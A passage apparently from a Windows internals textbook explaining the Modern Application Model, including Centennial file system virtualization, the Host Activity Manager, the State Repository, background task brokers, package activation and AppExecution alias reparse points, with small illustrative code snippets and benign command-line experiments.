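def resolve_vfs(vfs_relative_path):
    """Rewrite e.g. 'System\\user32.dll' to 'C:\\Windows\\System32\\user32.dll'."""
    folder, _, rest = vfs_relative_path.partition("\\")
    target = VFS_MAP.get(folder)
    if target is None:
        return None               # not one of the virtualized folders
    return target + "\\" + rest if rest else target
```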
The File System Virtualization is provided by three different drivers, which are heavily used for
Argon containers:
I
Windows Bind minifilter driver (BindFlt) Manages the redirection of the Centennial application's files. This means that if the Centennial app wants to read or write to one of its existing
virtualized files, the I/O is redirected to the file’s original position. When the application creates
instead a file on one of the virtualized folders (for example, in C:\Windows), and the file does
not already exist, the operation is allowed (assuming that the user has the needed permissions)
and the redirection is not applied.
I
Windows Container Isolation minifilter driver (Wcifs) Responsible for merging the
content of different virtualized folders (called layers) and creating a unique view. Centennial
applications use this driver to merge the content of the local user’s application data folder
(usually C:\Users\<UserName>\AppData) with the app’s application cache folder, located in C:\
User\<UserName>\Appdata\Local\Packages\<Package Full Name\LocalCache. The driver is
even able to manage the merge of multiple packages, meaning that each package can operate
on its own private view of the merged folders. To support this feature, the driver stores a Layer
ID of each package in the Reparse point of the target folder. In this way, it can construct a layer
map in memory and is able to operate on different private areas (internally called Scratch areas).
This advanced feature, at the time of this writing, is configured only for related set, a feature
described later in the chapter.
I
Windows Container Name Virtualization minifilter driver (Wcnfs) While the Wcifs driver
merges multiple folders, Wcnfs is used by Centennial to set up the name redirection of the local
user application data folder. Unlike in the previous case, when the app creates a new file or
folder in the virtualized application data folder, the file is stored in the application cache folder,
and not in the real one, regardless of whether the file already exists.
One important concept to keep in mind is that the BindFlt filter operates on single files, whereas Wcnfs
and Wcifs drivers operate on folders. Centennial uses minifilters’ communication ports to correctly set up
the virtualized file system infrastructure. The setup process is completed using a message-based commu-
nication system (where the Centennial runtime sends a message to the minifilter and waits for its re-
sponse). Table 8-36 shows a summary of the file system virtualization applied to Centennial applications.
TABLE 8-36 File system virtualization applied to Centennial applications
Operation
Result
Read or enumeration of a well-known
Windows folder
The operation returns a dynamic merge of the corresponding VFS folder with the local system counterpart. Files that exist in the VFS folder always have precedence over files that already exist in the local system one.
Writes on the application data folder
All the writes on the application data folder are redirected to the local
Centennial application cache.
All writes inside the package folder
Forbidden, read-only.
All writes outside the package folder
Allowed if the user has permission.
The Host Activity Manager
Windows 10 has unified various components that were interacting with the state of a packaged ap-
plication in a noncoordinated way. As a result, a brand-new component, called Host Activity Manager
(HAM) became the central component and the only one that manages the state of a packaged applica-
tion and exposes a unified API set to all its clients.
Unlike its predecessors, the Host Activity Manager exposes activity-based interfaces to its clients.
A host is the object that represents the smallest unit of isolation recognized by the Application model.
Resources, suspend/resume and freeze states, and priorities are managed as a single unit, which usu-
ally corresponds to a Windows Job object representing the packaged application. The job object may
contain only a single process for simple applications, but it could contain even different processes for
applications that have multiple background tasks (such as multimedia players, for example).
In the new Modern Application Model, there are three job types:
I
Mixed A mix of foreground and background activities but typically associated with the fore-
ground part of the application. Applications that include background tasks (like music playing
or printing) use this kind of job type.
I
Pure A host that is used for purely background work.
I
Systemic A host that executes Windows code on behalf of the application (for example, background downloads).
An activity always belongs to a host and represents the generic interface for client-specific concepts
such as windows, background tasks, task completions, and so on. A host is considered “Active” if its
job is unfrozen and it has at least one running activity. The HAM clients are components that interact
and control the lifetime of activities. Multiple components are HAM clients: View Manager, Broker
Infrastructure, various Shell components (like the Shell Experience Host), AudioSrv, Task completions,
and even the Windows Service Control Manager.
The Modern application’s lifecycle consists of four states: running, suspending, suspend-complete,
and suspended (states and their interactions are shown in Figure 8-43.)
I
Running The state where an application is executing part of its code, other than when it's
suspending. An application could be in “running” state not only when it is in a foreground state
but even when it is running background tasks, playing music, printing, or any number of other
background scenarios.
I
Suspending This state represents a time-limited transition state that happens when HAM
asks the application to suspend. HAM can do this for different reasons, like when the applica-
tion loses the foreground focus, when the system has limited resources or is entering a battery-
safe mode, or simply because an app is waiting for some UI event. When this happens, an
app has a limited amount of time to go to the suspended state (usually 5 seconds maximum);
otherwise, it will be terminated.
I
SuspendComplete This state represents an application that has finished suspending and
notifies the system that it is done. Therefore, its suspend procedure is considered completed.
I
Suspended Once an app completes suspension and notifies the system, the system freez-
es the application’s job object using the NtSetInformationJobObject API call (through the
JobObjectFreezeInformation information class) and, as a result, none of the app code can run.
FIGURE 8-43 Scheme of the lifecycle of a packaged application (states: Running (Active), Suspending, SuspendComplete, and Suspended (Halted)).
With the goal of preserving system efficiency and saving system resources, the Host Activity Manager by default will always require an application to suspend; HAM clients must explicitly ask HAM to keep an application alive. For foreground applications, the component responsible for keeping the app alive is the View Manager. The same applies to background tasks: the Broker Infrastructure is the component responsible for determining which process hosting the background activity should remain alive (and will request that HAM keep the application alive).
Packaged applications do not have a Terminated state. This means that an application does not
have a real notion of an Exit or Terminate state and should not try to terminate itself. The actual model
for terminating a Packaged application is that first it gets suspended, and then HAM, if required, calls
NtTerminateJobObject API on the application's job object. HAM automatically manages the app life-
time and destroys the process only as needed. HAM does not decide itself to terminate the application;
instead, its clients are required to do so (the View Manager or the Application Activation Manager are
good examples). A packaged application can’t distinguish whether it has been suspended or termi-
nated. This allows Windows to automatically restore the previous state of the application even if it has
been terminated or if the system has been rebooted. As a result, the packaged application model is
completely different from the standard Win32 application model.
To properly suspend and resume a Packaged application, the Host Activity manager uses the new
PsFreezeProcess and PsThawProcess kernel APIs. The process Freeze and Thaw operations are similar to
suspend and resume, with the following two major differences:
■ A new thread that is injected or created in the context of a deep-frozen process will not run, even if the CREATE_SUSPENDED flag is not used at creation time or if the NtResumeProcess API is called to start the thread.
■ A new Freeze counter is implemented in the EPROCESS data structure. This means that a process could be frozen multiple times. To allow a process to be thawed, the total number of thaw requests must be equal to the number of freeze requests. Only in this case are all the nonsuspended threads allowed to run.
The State Repository
The Modern Application Model introduces a new way for storing packaged applications’ settings,
package dependencies, and general application data. The State Repository is the new central store
that contains all this kind of data and has an important central role in the management of all modern
applications: Every time an application is downloaded from the store, installed, activated, or removed,
new data is read or written to the repository. The classical usage example of the State Repository is
represented by the user clicking on a tile in the Start menu. The Start menu resolves the full path of
the application’s activation file (which could be an EXE or a DLL, as already seen in Chapter 7 of Part 1),
reading from the repository. (This is actually simplified, because the ShellExecutionHost process enu-
merates all the modern applications at initialization time.)
The State Repository is implemented mainly in two libraries: Windows.StateRepository.dll and
Windows.StateRepositoryCore.dll. Although the State Repository Service runs the server part of the
repository, UWP applications talk with the repository using the Windows.StateRepositoryClient.dll
library. (All the repository APIs are full trust, so WinRT clients need a Proxy to correctly communicate
with the server. This is the role of another DLL, named Windows.StateRepositoryPs.dll.) The root location of the State Repository is stored in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\PackageRepositoryRoot registry value, which usually points to the C:\ProgramData\Microsoft\Windows\AppRepository path.
The State Repository is implemented across multiple databases, called partitions. Tables in the data-
base are called entities. Partitions have different access and lifetime constraints:
■ Machine This database includes package definitions, an application’s data and identities, and primary and secondary tiles (used in the Start menu), and it is the master registry that defines who can access which package. This data is read extensively by different components (like the TileDataRepository library, which is used by Explorer and the Start menu to manage the different tiles), but it’s written primarily by the AppX deployment (rarely by some other minor components). The Machine partition is usually stored in a file called StateRepository-Machine.srd, located in the state repository root folder.
■ Deployment Stores machine-wide data mostly used only by the deployment service (AppXSvc) when a new package is registered or removed from the system. It includes the applications’ file list and a copy of each modern application’s manifest file. The Deployment partition is usually stored in a file called StateRepository-Deployment.srd.
All partitions are stored as SQLite databases. Windows compiles its own version of SQLite into the
StateRepository.Core.dll library. This library exposes the State Repository Data Access Layer (also known
as DAL) APIs that are mainly wrappers to the internal database engine and are called by the State
Repository service.
Sometimes various components need to know when some data in the State Repository is written
or modified. In Windows 10 Anniversary update, the State Repository has been updated to support
changes and events tracking. It can manage different scenarios:
■ A component wants to subscribe for data changes for a certain entity. The component receives a callback when the data is changed through a SQL transaction. Multiple SQL transactions are part of a Deployment operation. At the end of each database transaction, the State Repository determines whether a Deployment operation is completed, and, if so, calls each registered listener.
■ A process is started or wakes from suspension and needs to discover what data has changed since it was last notified or looked at. The State Repository can satisfy this request using the ChangeId field, which, in the tables that support this feature, represents a unique temporal identifier of a record.
■ A process retrieves data from the State Repository and needs to know if the data has changed since it was last examined. Data changes are always recorded in compatible entities via a new table called Changelog. The latter always records the time, the change ID of the event that created the data, and, if applicable, the change ID of the event that deleted the data.
The modern Start menu uses the changes and events tracking feature of the State Repository to work
properly. Every time the ShellExperienceHost process starts, it requests the State Repository to notify
its controller (NotificationController.dll) every time a tile is modified, created, or removed. When the
user installs or removes a modern application through the Store, the application deployment server
executes a DB transaction for inserting or removing the tile. The State Repository, at the end of the
transaction, signals an event that wakes up the controller. In this way, the Start menu can modify its ap-
pearance almost in real time.
Note In a similar way, the modern Start menu is automatically able to add or remove an
entry for every new standard Win32 application installed. The application setup program
usually creates one or more shortcuts in one of the classic Start menu folder locations
(systemwide path: C:\ProgramData\Microsoft\Windows\Start Menu, or per-user path:
C:\Users\<UserName>\AppData\Roaming\Microsoft\Windows\Start Menu). The modern
Start menu uses the services provided by the AppResolver library to register file system
notifications on all the Start menu folders (through the ReadDirectoryChangesW Win32 API).
In this way, whenever a new shortcut is created in the monitored folders, the library can get
a callback and signal the Start menu to redraw itself.
EXPERIMENT: Witnessing the state repository
You can open each partition of the state repository fairly easily using your preferred SQLite
browser application. For this experiment, you need to download and install an SQLite browser,
like the open-source DB Browser for SQLite, which you can download from http://sqlitebrowser.
org/. The State Repository path is not accessible by standard users. Furthermore, each parti-
tion’s file could be in use in the exact moment that you will access it. Thus, you need to copy
the database file in another folder before trying to open it with the SQLite browser. Open
an administrative command prompt (by typing cmd in the Cortana search box and select-
ing Run As Administrator after right-clicking the Command Prompt label) and insert the
following commands:
C:\WINDOWS\system32>cd “C:\ProgramData\Microsoft\Windows\AppRepository”
C:\ProgramData\Microsoft\Windows\AppRepository>copy StateRepository-Machine.srd
"%USERPROFILE%\Documents"
In this way, you have copied the State Repository machine partition into your Documents
folder. The next stage is to open it. Start DB Browser for SQLite using the link created in the
Start menu or the Cortana search box and click the Open Database button. Navigate to the
Documents folder, select All Files (*) in the File Type combo box (the state repository database doesn’t use a standard SQLite file extension), and open the copied StateRepository-Machine.
srd file. The main view of DB Browser for SQLite is the database structure. For this experiment
you need to choose the Browse Data sheet and navigate through the tables like Package,
Application, PackageLocation, and PrimaryTile.
The Application Activation Manager and many other components of the Modern Application
Model use standard SQL queries to extract the needed data from the State Repository. For ex-
ample, to extract the package location and the executable name of a modern application, a SQL
query like the following one could be used:
SELECT p.DisplayName, p.PackageFullName, pl.InstalledLocation, a.Executable, pm.Name
FROM Package AS p
INNER JOIN PackageLocation AS pl ON p._PackageID=pl.Package
INNER JOIN PackageFamily AS pm ON p.PackageFamily=pm._PackageFamilyID
INNER JOIN Application AS a ON a.Package=p._PackageID
WHERE pm.PackageFamilyName="<Package Family Name>"
The DAL (Data Access Layer) uses similar queries to provide services to its clients.
You can note the total number of records in the table and then install a new application from the store. If, after the deployment process is completed, you again copy the database file, you will find that the number of records changes. This happens in multiple tables. In particular, if the new app installs a new tile, the PrimaryTile table adds a record for the new tile shown in the Start menu.
The Dependency Mini Repository
Opening an SQLite database and extracting the needed information through an SQL query could be
an expensive operation. Furthermore, the current architecture requires some interprocess communica-
tion done through RPC. Those two constraints sometimes are too restrictive to be satisfied. A classic
example is represented by a user launching a new application (maybe an Execution Alias) through the
command-line console. Checking the State Repository every time the system spawns a process intro-
duces a big performance issue. To fix these problems, the Application Model has introduced another
smaller store that contains Modern applications’ information: the Dependency Mini Repository (DMR).
Unlike the State Repository, the Dependency Mini Repository does not make use of any database but stores the data in a Microsoft-proprietary binary format that can be accessed by any file system in any security context (even a kernel-mode driver could possibly parse the DMR data). The System Metadata directory, which is represented by a folder named Packages in the State Repository root path, contains a list of subfolders, one for every installed package. The Dependency Mini Repository is represented by a .pckgdep file, named after the user’s SID. The DMR file is created by the Deployment
service when a package is registered for a user (for further details, see the “Package registration” sec-
tion later in this chapter).
The Dependency Mini Repository is heavily used when the system creates a process that belongs to
a packaged application (in the AppX Pre-CreateProcess extension). Thus, it’s entirely implemented in
the Win32 kernelbase.dll (with some stub functions in kernel.appcore.dll). When a DMR file is opened
at process creation time, it is read, parsed, and memory-mapped into the parent process. After the child process is created, the loader code maps it into the child process as well. The DMR file contains various information, including
■ Package information, like the ID, full name, full path, and publisher
■ Application information: application user model ID and relative ID, description, display name, and graphical logos
■ Security context: AppContainer SID and capabilities
■ Target platform and the package dependencies graph (used in case a package depends on one or more other packages)
The DMR file is designed to contain even additional data in future Windows versions, if required.
Using the Dependency Mini Repository file, the process creation is fast enough and does not require a
query into the State Repository. Noteworthy is that the DMR file is closed after process creation. So, it is possible to rewrite the .pckgdep file, adding an optional package even while the Modern application is executing. In this way, the user can add a feature to their modern application without restarting it. Some small parts of the package mini repository (mostly only the package full name and path) are replicated into different registry keys as a cache for faster access. The cache is often used for common operations (like understanding whether a package exists).
Background tasks and the Broker Infrastructure
UWP applications usually need a way to run part of their code in the background. This code doesn’t
need to interact with the main foreground process. UWP supports background tasks, which provide
functionality to the application even when the main process is suspended or not running. There are
multiple reasons why an application may use background tasks: real-time communications, mails, IM,
multimedia music, video player, and so on. A background task can be associated with triggers and conditions. A trigger is a global system asynchronous event that, when it happens, signals the starting of a background task. The background task at this point may or may not be started, based on its applied conditions. For example, a background task used in an IM application could start only when the user
logs on (a system event trigger) and only if the Internet connection is available (a condition).
In Windows 10, there are two types of background tasks:
■ In-process background task The application code and its background task run in the same process. From a developer’s point of view, this kind of background task is easier to implement, but it has the big drawback that if a bug hits its code, the entire application crashes. The in-process background task doesn’t support all the triggers available for out-of-process background tasks.
■ Out-of-process background task The application code and its background task run in different processes (the process could run in a different job object, too). This type of background task is more resilient, runs in the backgroundtaskhost.exe host process, and can use all the triggers and conditions. If a bug hits the background task, it will never kill the entire application. The main drawback is the performance cost of all the RPC code that needs to be executed for the interprocess communication between the processes.
To provide the best user experience, all background tasks have an execution time limit of 30 seconds total. After 25 seconds, the Background Broker Infrastructure service calls the task’s cancellation handler (in WinRT, this is called the OnCanceled event). When this event happens, the background task still has 5 seconds to completely clean up and exit. Otherwise, the process that contains the background task code (which could be BackgroundTaskHost.exe in case of out-of-process tasks; otherwise, it’s the application process) is terminated. Developers of personal or business UWP applications can remove this limit, but such an application could not be published in the official Microsoft Store.
The Background Broker Infrastructure (BI) is the central component that manages all the
Background tasks. The component is implemented mainly in bisrv.dll (the server side), which lives in
the Broker Infrastructure service. Two types of clients can use the services provided by the Background
Broker Infrastructure: Standard Win32 applications and services can import the bi.dll Background Broker
Infrastructure client library; WinRT applications always link to biwinrt.dll, the library that provides WinRT
APIs to modern applications. The Background Broker Infrastructure could not exist without the brokers.
The brokers are the components that generate the events that are consumed by the Background Broker
Server. There are multiple kinds of brokers. The most important are the following:
■ System Events Broker Provides triggers for system events like network connections’ state changes, user logon and logoff, system battery state changes, and so on
■ Time Broker Provides repetitive or one-shot timer support
■ Network Connection Broker Provides a way for UWP applications to get an event when a connection is established on certain ports
■ Device Services Broker Provides device arrival triggers (when a user connects or disconnects a device). Works by listening to PnP events originating from the kernel
■ Mobile Broad Band Experience Broker Provides all the critical triggers for phones and SIMs
The server part of a broker is implemented as a windows service. The implementation is different
for every broker. Most work by subscribing to WNF states (see the “Windows Notification Facility” sec-
tion earlier in this chapter for more details) that are published by the Windows kernel; others are built
on top of standard Win32 APIs (like the Time Broker). Covering the implementation details of all the
brokers is outside the scope of this book. A broker can simply forward events that are generated somewhere else (like in the Windows kernel) or can generate new events based on some other conditions and states. Brokers forward the events that they manage through WNF: each broker creates a WNF state name that the background infrastructure subscribes to. In this way, when the broker publishes new state data, the Broker Infrastructure, which is listening, wakes up and forwards the event to its clients.
Each broker also includes the client infrastructure: a WinRT and a Win32 library. The Background Broker Infrastructure and its brokers expose three kinds of APIs to their clients:
■ Non-trust APIs Usually used by WinRT components that run under AppContainer or in a sandbox environment. Supplementary security checks are made. The callers of this kind of API can’t specify a different package name or operate on behalf of another user (that is, BiRtCreateEventForApp).
■ Partial-trust APIs Used by Win32 components that live in a Medium-IL environment. Callers of this kind of API can specify a Modern application’s package full name but can’t operate on behalf of another user (that is, BiPtCreateEventForApp).
■ Full-trust APIs Used only by high-privileged system or administrative Win32 services. Callers of these APIs can operate on behalf of different users and on different packages (that is, BiCreateEventForPackageName).
Clients of the brokers can decide whether to subscribe directly to an event provided by the
specific broker or subscribe to the Background Broker Infrastructure. WinRT always uses the latter
method. Figure 8-44 shows an example of initialization of a Time trigger for a Modern Application
Background task.
[Figure 8-44 shows a UWP application (importing BiWinRt.dll) calling BiRtCreateEventForApp with a callback, over RPC, into the Broker Infrastructure. The Time Broker server creates the broker event (CreateBrokerEvent) and calls SetWaitableTimer; when the timer fires, the callback publishes new WNF state data. The Broker Infrastructure, which subscribed to that WNF state, starts the Background Task Host and notifies the app if needed.]
FIGURE 8-44 Architecture of the Time Broker.
Another important service that the Background Broker Infrastructure provides to the Brokers
and to its clients is the storage capability for background tasks. This means that when the user shuts
down and then restarts the system, all the registered background tasks are restored and rescheduled
as before the system was restarted. To achieve this properly, when the system boots and the Service
Control Manager (for more information about the Service Control Manager, refer to Chapter 10) starts
the Broker Infrastructure service, the latter, as a part of its initialization, allocates a root storage GUID,
and, using the NtLoadKeyEx native API, loads a private copy of the Background Broker registry hive. The service tells the NT kernel to load a private copy of the hive using a special flag (REG_APP_HIVE). The
BI hive resides in the C:\Windows\System32\Config\BBI file. The root key of the hive is mounted as
\Registry\A\<Root Storage GUID> and is accessible only to the Broker Infrastructure service’s process
(svchost.exe, in this case; Broker Infrastructure runs in a shared service host). The Broker Infrastructure
hive contains a list of events and work items, which are ordered and identified using GUIDs:
■ An event represents a Background task’s trigger. It is associated with a broker ID (which represents the broker that provides the event type), the package full name and the user of the UWP application that it is associated with, and some other parameters.
■ A work item represents a scheduled Background task. It contains a name, a list of conditions, the task entry point, and the associated trigger event GUID.
The BI service enumerates each subkey and then restores all the triggers and background tasks. It
cleans orphaned events (the ones that are not associated with any work items). It then finally publishes
a WNF ready state name. In this way, all the brokers can wake up and finish their initialization.
The Background Broker Infrastructure is deeply used by UWP applications. Even regular Win32
applications and services can make use of BI and brokers, through their Win32 client libraries. Some
notable examples are provided by the Task Scheduler service, Background Intelligent Transfer service,
Windows Push Notification service, and AppReadiness.
Packaged applications setup and startup
Packaged application lifetime is different from that of standard Win32 applications. In the Win32 world, the setup procedure for an application can vary from just copying and pasting an executable file to
executing complex installation programs. Even if launching an application is just a matter of running
an executable file, the Windows loader takes care of all the work. The setup of a Modern application is
instead a well-defined procedure that passes mainly through the Windows Store. In Developer mode,
an administrator is even able to install a Modern application from an external .Appx file. The package
file needs to be digitally signed, though. This package registration procedure is complex and involves
multiple components.
Before digging into package registration, it’s important to understand another key concept that
belongs to Modern applications: package activation. Package activation is the process of launching a
Modern application, which can or cannot show a GUI to the user. This process is different based on the
type of Modern application and involves various system components.
Package activation
A user is not able to launch a UWP application by just executing its .exe file (excluding the case of the new AppExecution aliases, created just for this reason; we describe AppExecution aliases later in this chapter). To correctly activate a Modern application, the user needs to click a tile in the modern menu, use a special link file that Explorer is able to parse, or use some other activation points (double-click an application’s document, invoke a special URL, and so on). The ShellExperienceHost process decides which activation to perform based on the application type.
UWP applications
The main component that manages this kind of activation is the Activation Manager, which is imple-
mented in ActivationManager.dll and runs in a sihost.exe service because it needs to interact with the
user’s desktop. The activation manager strictly cooperates with the View Manager. The modern menu
calls into the Activation Manager through RPC. The latter starts the activation procedure, which is sche-
matized in Figure 8-45:
1. Gets the SID of the user requesting the activation, the package family ID, and the PRAID of the package. In this way, it can verify that the package is actually registered in the system (using the Dependency Mini Repository and its registry cache).
2. If the previous check yields that the package needs to be registered, it calls into the AppX Deployment client and starts the package registration. A package might need to be registered in case of “on-demand registration,” meaning that the application is downloaded but not completely installed (this saves time, especially in enterprise environments), or in case the application needs to be updated. The Activation Manager knows which of the two cases applies thanks to the State Repository.
3. It registers the application with HAM and creates the HAM host for the new package and its initial activity.
4. The Activation Manager talks with the View Manager (through RPC) with the goal of initializing the GUI activation of the new session (even in case of background activations, the View Manager always needs to be informed).
5. The activation continues in the DcomLaunch service because the Activation Manager at this stage uses a WinRT class to launch the low-level process creation.
6. The DcomLaunch service is responsible for launching COM, DCOM, and WinRT servers in response to object activation requests and is implemented in the rpcss.dll library. DcomLaunch captures the activation request and prepares to call the CreateProcessAsUser Win32 API. Before doing this, it needs to set the proper process attributes (like the package full name), ensure that the user has the proper license for launching the application, duplicate the user token, set the low integrity level on the new one, and stamp it with the needed security attributes. (Note that the DcomLaunch service runs under a System account, which has TCB privilege. This kind of token manipulation requires TCB privilege. See Chapter 7 of Part 1 for further details.) At this point, DcomLaunch calls CreateProcessAsUser, passing the package full name through one of the process attributes. This creates a suspended process.
I
The rest of the activation process continues in Kernelbase.dll. The token produced by
DcomLaunch is still not an AppContainer but contains the UWP Security attributes. A Special
code in the CreateProcessInternal function uses the registry cache of the Dependency Mini
Repository to gather the following information about the packaged application: Root Folder,
Package State, AppContainer package SID, and list of application’s capabilities. It then verifies
that the license has not been tampered with (a feature used extensively by games). At this point,
the Dependency Mini Repository file is mapped into the parent process, and the UWP applica-
tion DLL alternate load path is resolved.
I
The AppContainer token, its object namespace, and symbolic links are created with the
BasepCreateLowBox function, which performs the majority of the work in user mode, except for
the actual AppContainer token creation, which is performed using the NtCreateLowBoxToken
kernel function. We have already covered AppContainer tokens in Chapter 7 of Part 1.
The kernel process object is created as usual by using the NtCreateUserProcess kernel API.
After the CSRSS subsystem has been informed, the BasepPostSuccessAppXExtension function
maps the Dependency Mini Repository in the PEB of the child process and unmaps it from the
parent process. The new process can then be finally started by resuming its main thread.
FIGURE 8-45 Scheme of the activation of a modern UWP application. (Components shown: the Modern Start Menu (ShellExperienceHost.exe), the Activation Manager, the View Manager, the Host Activity Manager (HAM), the State Repository, the Dependency Mini Repository, DcomLaunch, KernelBase.dll, and the NT kernel.)
Centennial applications
The Centennial applications activation process is similar to the UWP activation but is implemented
in a totally different way. The modern menu, ShellExperienceHost, always calls into Explorer.exe for
this kind of activation. Multiple libraries are involved in the Centennial activation type and mapped in
Explorer, like Daxexec.dll, Twinui.dll, and Windows.Storage.dll. When Explorer receives the activation
request, it gets the package full name and application id, and, through RPC, grabs the main application
executable path and the package properties from the State Repository. It then executes the same steps
(2 through 4) as for UWP activations. The main difference is that, instead of using the DcomLaunch
service, the Centennial activation at this stage launches the process using the ShellExecute API of the
Shell32 library. The ShellExecute code has been updated to recognize Centennial applications and to use
a special activation procedure located in Windows.Storage.dll (through COM). The latter library uses
RPC to call the RAiLaunchProcessWithIdentity function located in the AppInfo service. AppInfo uses the
State Repository to verify the license of the application, the integrity of all its files, and the calling pro-
cess’s token. It then stamps the token with the needed security attributes and finally creates the process
in a suspended state. AppInfo passes the package full name to the CreateProcessAsUser API using the
PROC_THREAD_ATTRIBUTE_PACKAGE_FULL_NAME process attribute.
Unlike the UWP activation, no AppContainer is created at all. Instead, AppInfo calls the
PostCreateProcessDesktopAppXActivation function of DaxExec.dll, with the goal of initializing the
virtualization layer of Centennial applications (registry and file system). Refer to the “Centennial
application” section earlier in this chapter for further information.
EXPERIMENT: Activate Modern apps through the command line
In this experiment, you will understand better the differences between UWP and Centennial, and
you will discover the motivation behind the choice to activate Centennial applications using the
ShellExecute API. For this experiment, you need to install at least one Centennial application. At
the time of this writing, a simple way to recognize this kind of application is to use the
Windows Store. In the store, after selecting the target application, scroll down to the “Additional
Information” section. If you see “This app can: Uses all system resources,” which is usually located
before the “Supported languages” part, it means that the application is Centennial type.
In this experiment, you will use Notepad++. Search and install the “(unofficial) Notepad++”
application from the Windows Store. Then open the Camera application and Notepad++. Open
an administrative command prompt (you can do this by typing cmd in the Cortana search box
and selecting Run As Administrator after right-clicking the Command Prompt label). You need to
find the full path of the two running packaged applications using the following commands:
wmic process where "name='WindowsCamera.exe'" get ExecutablePath
wmic process where "name='notepad++.exe'" get ExecutablePath
Now you can create two links to the application’s executables using the commands:
mklink "%USERPROFILE%\Desktop\notepad.exe" "<Notepad++ executable Full Path>"
mklink "%USERPROFILE%\Desktop\camera.exe" "<WindowsCamera executable full path>"
replacing the content between the < and > symbols with the real executable path discovered
by the first two commands.
You can now close the command prompt and the two applications. You should have created
two new links in your desktop. Unlike with the Notepad.exe link, if you try to launch the Camera
application from your desktop, the activation fails, and Windows returns an error dialog box like
the following:
This happens because Windows Explorer uses the Shell32 library to activate executable links.
In the case of UWP, the Shell32 library has no idea that the executable it will launch is a UWP
application, so it calls the CreateProcessAsUser API without specifying any package identity.
By contrast, Shell32 can identify Centennial apps; thus, in this case, the entire activation
process is executed, and the application is correctly launched. If you try to launch the two links
using the command prompt, none of them will correctly start the application. This is explained
by the fact that the command prompt doesn’t make use of Shell32 at all. Instead, it invokes the
CreateProcess API directly from its own code. This demonstrates the different activations of each
type of packaged application.
Note Starting with Windows 10 Creators Update (RS2), the Modern Application Model
supports the concept of Optional packages (internally called RelatedSet). Optional packages
are heavily used in games, where the main game supports DLC (or expansions), and in
packages that represent suites: Microsoft Office is a good example. A user can download
and install Word and, implicitly, the framework package that contains all the Office common
code. When the user later wants to install Excel, the deployment operation can skip the
download of the main framework package, because Word is an optional package of its main
Office framework.
Optional packages have a relationship with their main packages through their manifest files.
In the manifest file, there is the declaration of the dependency to the main package (using
AMUID). A deep description of the Optional packages architecture is beyond the scope of this book.
AppExecution aliases
As we have previously described, packaged applications could not be activated directly through their
executable file. This represents a big limitation, especially for the new modern Console applications.
With the goal of enabling the launch of Modern apps (Centennial and UWP) through the command
line, starting from Windows 10 Fall Creators Update (build 1709), the Modern Application Model has
introduced the concept of AppExecution aliases. With this new feature, the user can launch Edge or
any other modern application through the console command line. An AppExecution alias is basically
a 0-byte executable file located in C:\Users\<UserName>\AppData\Local\Microsoft\WindowsApps
(as shown in Figure 8-46). The location is added to the system executable search path
list (through the PATH environment variable); as a result, to execute a modern application, the user
could specify any executable file name located in this folder without the complete path (like in the Run
dialog box or in the console command line).
FIGURE 8-46 The AppExecution aliases main folder.
How can the system execute a 0-byte file? The answer lies in a little-known feature of the file system:
reparse points. Reparse points are usually employed for symbolic link creation, but they can store any
data, not only symbolic link information. The Modern Application Model uses this feature to store the
packaged application’s activation data (package family name, Application user model ID, and applica-
tion path) directly into the reparse point.
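A toy encoder/decoder can make the idea concrete. The tag value below is the documented IO_REPARSE_TAG_APPEXECLINK constant, but the binary layout here is invented purely for illustration; only the field names (package family name, AUMID, target path) mirror the real activation data:

```python
import struct

# Documented reparse tag for AppExecution aliases (IO_REPARSE_TAG_APPEXECLINK).
APPEXECLINK_TAG = 0x8000001B

def pack_alias(family: str, aumid: str, target: str) -> bytes:
    # Store the three activation strings NUL-separated after a tag + length
    # header. (The real on-disk format differs; this layout is illustrative.)
    payload = b"\x00".join(s.encode() for s in (family, aumid, target))
    return struct.pack("<IH", APPEXECLINK_TAG, len(payload)) + payload

def unpack_alias(blob: bytes):
    tag, length = struct.unpack_from("<IH", blob)
    if tag != APPEXECLINK_TAG:
        raise ValueError("not an AppExecution alias reparse point")
    family, aumid, target = blob[6:6 + length].split(b"\x00")
    return family.decode(), aumid.decode(), target.decode()
```

A round trip with the Edge values shown in the experiment later in this section recovers all three strings.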
When the user launches an AppExecution alias executable, the CreateProcess API is used as usual.
The NtCreateUserProcess system call, used to orchestrate the kernel-mode process creation (see the
“Flow of CreateProcess” section of Chapter 3 in Part 1 for details), fails because the content of the file is
empty. The file system, as part of normal process creation, opens the target file (through IoCreateFileEx
API), encounters the reparse point data (while parsing the last node of the path) and returns a STATUS_
REPARSE code to the caller. NtCreateUserProcess translates this code to the STATUS_IO_REPARSE_TAG_
NOT_HANDLED error and exits. The CreateProcess API now knows that the process creation has failed
due to an invalid reparse point, so it loads and calls into the ApiSetHost.AppExecutionAlias.dll library,
which contains code that parses modern applications’ reparse points.
The library’s code parses the reparse point, grabs the packaged application activation data, and
calls into the AppInfo service with the goal of correctly stamping the token with the needed security at-
tributes. AppInfo verifies that the user has the correct license for running the packaged application and
checks the integrity of its files (through the State Repository). The actual process creation is done by the
calling process. The CreateProcess API detects the reparse error and restarts its execution starting with
the correct package executable path (usually located in C:\Program Files\WindowsApps\). This time, it
correctly creates the process and the AppContainer token or, in case of Centennial, initializes the virtu-
alization layer (actually, in this case, another RPC into AppInfo is used again). Furthermore, it creates the
HAM host and its activity, which are needed for the application. The activation at this point is complete.
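The fail-parse-retry control flow described above can be modeled in a few lines. All names here are invented stand-ins (the real logic lives in CreateProcess, NtCreateUserProcess, and ApiSetHost.AppExecutionAlias.dll); only the shape of the flow is meant to match the text:

```python
class ReparsePointError(Exception):
    """Stands in for STATUS_IO_REPARSE_TAG_NOT_HANDLED."""
    def __init__(self, alias_data):
        self.alias_data = alias_data

def nt_create_user_process(path, alias_table):
    # Opening a 0-byte alias hits its reparse point, so process creation
    # fails and the reparse data surfaces to the caller.
    if path in alias_table:
        raise ReparsePointError(alias_table[path])
    return {"image": path, "state": "running"}

def create_process(path, alias_table):
    try:
        return nt_create_user_process(path, alias_table)
    except ReparsePointError as err:
        # Parse the reparse data, have AppInfo stamp the token (elided),
        # then restart creation against the real package executable path.
        return nt_create_user_process(err.alias_data["target"], alias_table)
```

The second attempt targets the real package executable, which is why the caller never sees the intermediate reparse failure.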
EXPERIMENT: Reading the AppExecution alias data
In this experiment, you extract AppExecution alias data from the 0-bytes executable file. You
can use the FsReparser utility (found in this book’s downloadable resources) to parse both the
reparse points and the extended attributes of the NTFS file system. Just run the tool in a command
prompt window and specify the READ command-line parameter:
